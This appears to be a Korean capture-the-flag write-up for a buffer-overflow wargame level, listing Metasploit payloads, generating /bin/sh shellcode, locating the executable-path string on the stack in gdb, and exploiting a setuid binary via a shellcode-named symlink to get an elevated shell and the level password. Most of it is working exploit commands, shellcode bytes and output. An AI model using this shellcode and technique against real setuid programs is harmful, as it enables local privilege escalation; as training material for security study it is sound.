 windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
 windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
 windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
 windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
 windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
 windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
 windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
 windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
 windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
 windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
 windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
 windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
 windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager
 windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
 windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
 windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
 windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
 windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
 windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
 windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
 windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
 windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
 windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
 windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
 windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
 windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager
 windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
 windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
 windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
 windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
 windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
 windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
 windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
 windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
 windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
 windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
 windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
 windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
 windows/x64/exec normal Windows x64 Execute Command
 windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager
 windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
 windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager
 windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager
 windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline
 windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
 windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
 windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > use linux/x86/exec
msf payload(exec) > show options

Module options:

 Name Current Setting Required Description
---- --------------- -------- -----------
 CMD yes The command string to execute

msf payload(exec) > set CMD /bin/sh
CMD => /bin/sh
msf payload(exec) > generate -b '\x2f' -t c
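/*
 * linux/x86/exec - 70 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * PrependSetresuid=false, PrependSetreuid=false,
 * PrependSetuid=false, PrependChrootBreak=false,
 * AppendExit=false, CMD=/bin/sh
 *
 * Output of `generate -b '\x2f' -t c` above, with the string-literal
 * quotes restored so the listing actually compiles.  The bad-char list
 * excludes 0x2f ('/') because these bytes are used as a file name (a
 * symlink to the target), where '/' would be a path separator.  As
 * printed, none of the 70 bytes is 0x00 either, so the blob survives
 * strlen()/strcpy() and can be handed to execve() as a NUL-terminated
 * name.  NOTE(review): shikata_ga_nai produces a self-decoding stub, so
 * the bytes presumably must sit in memory that is both writable and
 * executable (the stack on this target) -- confirm before reusing.
 * sizeof(buf) is 71: the 70 payload bytes plus the implicit terminator.
 */
unsigned char buf[] =
    "\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1"
    "\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17"
    "\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85"
    "\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32"
    "\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e";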
msf payload(exec) >

Metasploit 에서 -b 옵션으로 지정한 바이트(bad char)는 인코더가 쉘코드를 생성할 때 결과에서 배제된다. 여기서 0x2f('/')를 배제한 이유는 이 쉘코드를 파일 이름(심볼릭 링크 이름)으로 사용할 것이기 때문인데, '/'가 섞이면 경로 구분자로 해석되어 하나의 파일 이름이 될 수 없다. 위에 출력된 70 바이트에는 문자열의 끝을 의미하는 0x00 도 들어 있지 않으므로 strcpy/strlen 을 거치거나 파일 이름으로 쓰더라도 잘리지 않는다. 이렇게 사용할 수 없는 바이트를 배제한 채 쉘코드를 얻을 수 있었다.

이제 이 쉘코드를 이용하여 공격을 해볼 것이다. 생성된 쉘코드가 70 바이트이므로 앞에 NOP 100 바이트를 붙여 총 170 바이트 길이의 파일 이름으로 먼저 주소를 확인할 것이다. (아래의 실제 공격 명령에서는 NOP 와 쉘코드 사이에 geteuid(0x31)/setreuid(0x46) 시스템 콜을 호출하는 것으로 보이는 14 바이트 `\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80` 가 추가되어 총 184 바이트가 되지만, NOP 슬레드가 100 바이트나 되므로 아래에서 구한 리턴 주소는 그대로 슬레드 안에 떨어진다.)

공격 전 아래와 같이 170 바이트의 파일명으로 심볼릭링크를 생성 후 스택에서 어느 주소값에 쓰이는지 확인해 보도록 하자.

[vampire@localhost vampire]$ ln -s skeleton_tmp `python -c "print 'A'*170"`
[vampire@localhost vampire]$ ls -al
total 76
drwx------ 2 vampire vampire 4096 Dec 23 00:33 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 vampire vampire 329 Dec 23 00:09 .bash_history
-rw-r--r-- 1 vampire vampire 24 Mar 1 2010 .bash_logout
-rw-r--r-- 1 vampire vampire 230 Mar 1 2010 .bash_profile
-rw-r--r-- 1 vampire vampire 124 Mar 1 2010 .bashrc
-rwxr-xr-x 1 vampire vampire 333 Mar 1 2010 .emacs
-rw-r--r-- 1 vampire vampire 3394 Mar 1 2010 .screenrc
-rw------- 1 vampire vampire 2905 Dec 22 23:59 .viminfo
-rw-rw-r-- 1 vampire vampire 51 Dec 22 01:55 .vimrc
lrwxrwxrwx 1 vampire vampire 12 Dec 23 00:33 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> skeleton_tmp
-rwsr-sr-x 1 skeleton skeleton 12752 Mar 3 2010 skeleton
-rw-r--r-- 1 root root 821 Mar 29 2010 skeleton.c
-rwsr-sr-x 1 vampire vampire 12752 Dec 23 00:23 skeleton_tmp
[vampire@localhost vampire]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b *main+369
Breakpoint 1 at 0x8048671
(gdb) r `python -c "print '\xbf'*48"`
Starting program: /home/vampire/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c print '\xbf'*48`

Breakpoint 1, 0x8048671 in main ()
(gdb) x/32wx $esp
0xbffff99c: 0xbfbfbfbf 0x00000000 0xbffff9e4 0xbffff9f0
0xbffff9ac: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffff9bc: 0x08048471 0x08048500 0x00000002 0xbffff9e4
0xbffff9cc: 0x08048390 0x080486ac 0x4000ae60 0xbffff9dc
0xbffff9dc: 0x40013e90 0x00000002 0xbffffae1 0xbffffb9a
0xbffff9ec: 0x00000000 0xbffffbcb 0xbffffbdd 0xbffffbf6
0xbffff9fc: 0xbffffc15 0xbffffc37 0xbffffc44 0xbffffe07
0xbffffa0c: 0xbffffe26 0xbffffe43 0xbffffe58 0xbffffe77
(gdb) 
0xbffffa1c: 0xbffffe82 0xbffffe92 0xbffffe9a 0xbffffeab
0xbffffa2c: 0xbffffeb5 0xbffffec3 0xbffffed4 0xbffffee2
0xbffffa3c: 0xbffffeed 0xbfffff00 0x00000000 0x00000003
0xbffffa4c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffa5c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffa6c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffa7c: 0x08048450 0x0000000b 0x000001fd 0x0000000c
0xbffffa8c: 0x000001fd 0x0000000d 0x000001fd 0x0000000e
(gdb) 
0xbffffa9c: 0x000001fd 0x00000010 0x0febfbff 0x0000000f
0xbffffaac: 0xbffffadc 0x00000000 0x00000000 0x00000000
0xbffffabc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffacc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffadc: 0x36383669 0x00000000 0x00000000 0x00000000
0xbffffaec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffafc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffb1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffccc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffd1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffe1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x2f000000 0x656d6f68 0x6d61762f
0xbfffff4c: 0x65726970 0x4141412f 0x41414141 0x41414141
0xbfffff5c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff6c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff7c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff8c: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) 
0xbfffff9c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffac: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffdc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffec: 0x41414141 0x41414141 0x41414141 0x00414141
0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000
(gdb) 
0xc0000004: Cannot access memory at address 0xc0000004
(gdb) 

덤프를 보면 환경변수 영역, argv[0](0xbffffae1)과 argv[1](0xbffffb9a)이 가리키는 문자열, 그리고 버퍼는 모두 0으로 지워졌지만, 스택 최상단 0xbfffff40 부근의 실행 파일 경로 문자열 "/home/vampire/AAAA..." 는 그대로 남아 있다. 이 문자열은 커널이 execve 시 스택 꼭대기에 따로 올려 두는 경로 복사본으로 argv 배열이 가리키는 문자열과는 별개이기 때문에, 프로그램의 argv 지우기 루프가 닿지 않는 것으로 보인다. 따라서 파일 이름 자체에 NOP + 쉘코드를 담고 리턴 주소를 이 영역의 NOP 슬레드 안쪽, 넉넉잡아 0xbfffff6c 쯤으로 잡고 공격을 진행하면 될 것으로 보인다. 이 주소는 실행 경로의 길이와 환경에 따라 조금씩 달라지므로, 실제 공격에서 파일 이름 길이가 바뀌면 리턴 주소가 여전히 슬레드 안에 들어가는지 확인해야 한다. 이제 공격을 해보도록 하자!

[vampire@localhost vampire]$ ln -s skeleton `python -c "print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80' + '\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e'"`
[vampire@localhost vampire]$ ls -al
total 76
drwx------ 2 vampire vampire 4096 Dec 23 00:35 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 vampire vampire 329 Dec 23 00:09 .bash_history
-rw-r--r-- 1 vampire vampire 24 Mar 1 2010 .bash_logout
-rw-r--r-- 1 vampire vampire 230 Mar 1 2010 .bash_profile
-rw-r--r-- 1 vampire vampire 124 Mar 1 2010 .bashrc
-rwxr-xr-x 1 vampire vampire 333 Mar 1 2010 .emacs
-rw-r--r-- 1 vampire vampire 3394 Mar 1 2010 .screenrc
-rw------- 1 vampire vampire 2905 Dec 22 23:59 .viminfo
-rw-rw-r-- 1 vampire vampire 51 Dec 22 01:55 .vimrc
lrwxrwxrwx 1 vampire vampire 12 Dec 23 00:33 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> skeleton_tmp
-rwsr-sr-x 1 skeleton skeleton 12752 Mar 3 2010 skeleton
-rw-r--r-- 1 root root 821 Mar 29 2010 skeleton.c
-rwsr-sr-x 1 vampire vampire 12752 Dec 23 00:23 skeleton_tmp
lrwxrwxrwx 1 vampire vampire 8 Dec 23 00:35 ????????????????????????????????????????????????????????????????????????????????????????????????????1??F_O)??1o??o??'7??h'?o?kt?*00m -> skeleton
[vampire@localhost vampire]$ ./`python -c "print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80' + '\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e'"` `python -c "print 'A'*44 + '\x6c\xff\xff\xbf'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$ 
